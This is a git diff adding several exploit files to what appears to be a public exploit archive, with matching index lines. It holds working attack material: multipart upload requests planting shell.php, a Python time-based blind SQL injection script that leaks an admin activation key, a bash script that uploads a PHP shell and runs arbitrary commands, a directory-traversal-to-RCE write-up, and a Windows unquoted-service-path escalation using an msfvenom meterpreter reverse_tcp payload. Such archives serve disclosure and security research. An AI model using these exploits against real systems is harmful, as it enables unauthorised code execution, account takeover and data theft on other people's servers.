000000000..812ca9acd --- /dev/null +++ b/exploits/php/webapps/48544.txt @@ -0,0 +1,62 @@ +# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: +Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution +(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# vulnerable file : manage_website.php +# Details: +login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. +change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. +path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php + +# Proof of Concept: +http://localhost/source%20code/manage_website.php + +POST /source%20code/manage_website.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------135192786613366 +Content-Length: 2539 +Referer: http://localhost/source%20code/manage_website.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------58631544014332: undefined +Content-Disposition: form-data; name="title" + +-----------------------------58631544014332 +Content-Disposition: form-data; name="short_title" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="footer" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_code" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_symbol" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="old_website_image" + +logo for hospital system.jpg +-----------------------------58631544014332 +Content-Disposition: form-data; name="website_image"; filename="shell.php" +Content-Type: application/octet-stream + + \ No newline at end of file diff --git a/exploits/php/webapps/48545.py b/exploits/php/webapps/48545.py new file mode 100755 index 000000000..71aa847f1 --- /dev/null +++ b/exploits/php/webapps/48545.py @@ -0,0 +1,34 @@ +# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: N/A + +# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database. +# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash. +# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]` + +import requests, time, string + +user = raw_input("Please enter your username: \n") +password = raw_input("Please enter your password: \n") +URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n") + +s = requests.Session() +data = {'login-username': (None, user), 'login-password':(None, password)} +s.post(url = URL + "login.php", files = data) +dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits +final = "" +while True: + for x in dictionary: + payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -' + r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload) + if int(r.elapsed.total_seconds()) > 4: + final += x + print "Leaking contents of admin hash: " + final + break + else: + pass \ No newline at end of file diff --git a/exploits/php/webapps/48546.txt b/exploits/php/webapps/48546.txt new file mode 100644 index 000000000..1543305fe --- /dev/null +++ b/exploits/php/webapps/48546.txt @@ -0,0 +1,76 @@ +# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection +# Google Dork: inurl:/eotools_share/ +# Date: 2020-06-03 +# Exploit Author: TSAR +# Vendor Homepage: http://www.oriolespinal.es/eowd +# Software Link: http://www.oriolespinal.es/eotools +# Version: ALL VERSION UP TO LATEST +# Tested on: MACOS 10.11.2 +# CVE : NOt YET + +[1]########### SQl INJECTION ########### + +Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable + +http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10-- + + +[2]########### SQl INJECTION ########### + + + + +Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable: + + +POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1 +Host: victim.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556 +Content-Length: 740 +Connection: close +Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada + +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="userfile"; filename="shell.php" +Content-Type: image/png + +PNG; +********************************/ +********************************/ +GIF89a; +********************/ +********************/ +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="categoria" + +pdfs +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="descripcion" + +123 +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="submit" + +upload +-----------------------------165073870416097602871919119556-- + + +the shell path is: + +http://victim.com/path/eotools_files/files/shell.php + + +========================================================== + +========================================================== + +Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r + [ALL MUSLIM AND ARAB HACKERS] + +========================================================== \ No newline at end of file diff --git a/exploits/php/webapps/48547.txt b/exploits/php/webapps/48547.txt new file mode 100644 index 000000000..18d079f01 --- /dev/null +++ b/exploits/php/webapps/48547.txt @@ -0,0 +1,62 @@ +# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: +Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution +(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# vulnerable file : manage_website.php +# Details: +login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. +change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. +path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php + +# Proof of Concept: +http://localhost/source%20code/manage_website.php + +POST /source%20code/manage_website.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------135192786613366 +Content-Length: 2539 +Referer: http://localhost/source%20code/manage_website.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------58631544014332: undefined +Content-Disposition: form-data; name="title" + +-----------------------------58631544014332 +Content-Disposition: form-data; name="short_title" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="footer" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_code" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_symbol" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="old_website_image" + +logo for hospital system.jpg +-----------------------------58631544014332 +Content-Disposition: form-data; name="website_image"; filename="shell.php" +Content-Type: application/octet-stream + + \ No newline at end of file diff --git a/exploits/php/webapps/48548.txt b/exploits/php/webapps/48548.txt new file mode 100644 index 000000000..96e1c1205 --- /dev/null +++ b/exploits/php/webapps/48548.txt @@ -0,0 +1,99 @@ +# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48550.txt b/exploits/php/webapps/48550.txt new file mode 100644 index 000000000..243053d2c --- /dev/null +++ b/exploits/php/webapps/48550.txt @@ -0,0 +1,29 @@ +# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: CVE-2020-13795 + +A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. + +For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: + `/var/www/html/navigate/private/1/templates/` + +My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). + +My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` + +Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: + +Traversal payload: +`../../../navigate.php` + +PHP Code execution payload: +``` + +``` \ No newline at end of file diff --git a/exploits/php/webapps/48552.sh b/exploits/php/webapps/48552.sh new file mode 100755 index 000000000..1097eaa66 --- /dev/null +++ b/exploits/php/webapps/48552.sh @@ -0,0 +1,52 @@ +# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-31 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 / Xampp Server and Wamp Server +# CVE : N/A +# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System + +#!/bin/bash +echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution" +echo "# Author ---> Selim Enes Karaduman" +echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND" +while getopts u:m:p:c: par +do +case $par in +u) url=$OPTARG ;; +m) mnum=$OPTARG ;; +p) passwd=$OPTARG ;; +c) command=$OPTARG ;; +esac +done +sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2) +url_for_req=$(echo $url | cut -d "/" -f 3) +function upload(){ +curl -i -s -k -X $'POST' \ + -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \ + -b $"$sess" \ + --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \ + $"$url/user/marriage-reg-form.php" >>/dev/null +} +upload + +#Execute the given command +shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '') + + +check=$(echo $command | grep " " | wc -l) +if [[ $check > 0 ]] +then +fixed_command=$(echo $command | sed 's/ /%20/g') +curl -s "$url/user/images/$shell_file?cmd=$fixed_command" +else +curl -s "$url/user/images/$shell_file?cmd=$command" +fi + + +echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS" +echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded" +shift $((OPTIND-1)) \ No newline at end of file diff --git a/exploits/windows/local/48543.txt b/exploits/windows/local/48543.txt new file mode 100644 index 000000000..3972d1db3 --- /dev/null +++ b/exploits/windows/local/48543.txt @@ -0,0 +1,53 @@ +# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path +# Author: Gobinathan L +# Date: 2020-06-03 +# Vendor Homepage: https://www.iobit.com +# Software Link: https://www.iobit.com/en/advanceduninstaller.php +# Version : 9.5.0.15 +# Tested on: Windows 10 64bit(EN) + +About Unquoted Service Path : +============================== + +When a service is created whose executable path contains spaces and isn't enclosed within quotes, +leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. +(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). + +Steps to recreate : +============================= + +1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] +2. The Vulnerable Service would Show up. +3. Check the Service Permissions by typing [ sc qc IObitUnSvr ] +4. The command would return.. + + C:\>sc qc IObitUnSvr + [SC] QueryServiceConfig SUCCESS + SERVICE_NAME: IObitUnSvr + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IObit Uninstaller Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" +6. Now create a Payload with msfvenom or other tools and name it to IObit.exe +7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory. +8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory. +9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ] +10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. + +During my testing : + +Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe +Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ] + +# Disclaimer : +========================= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a73d057de..ca945761d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows, 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, +48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php, 48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php, +48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware, +48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php, +48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php, +48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php, +48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php, +48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php, +48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php, +48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java, +48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php, +48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware, +48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php, +48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware, +48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, +48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,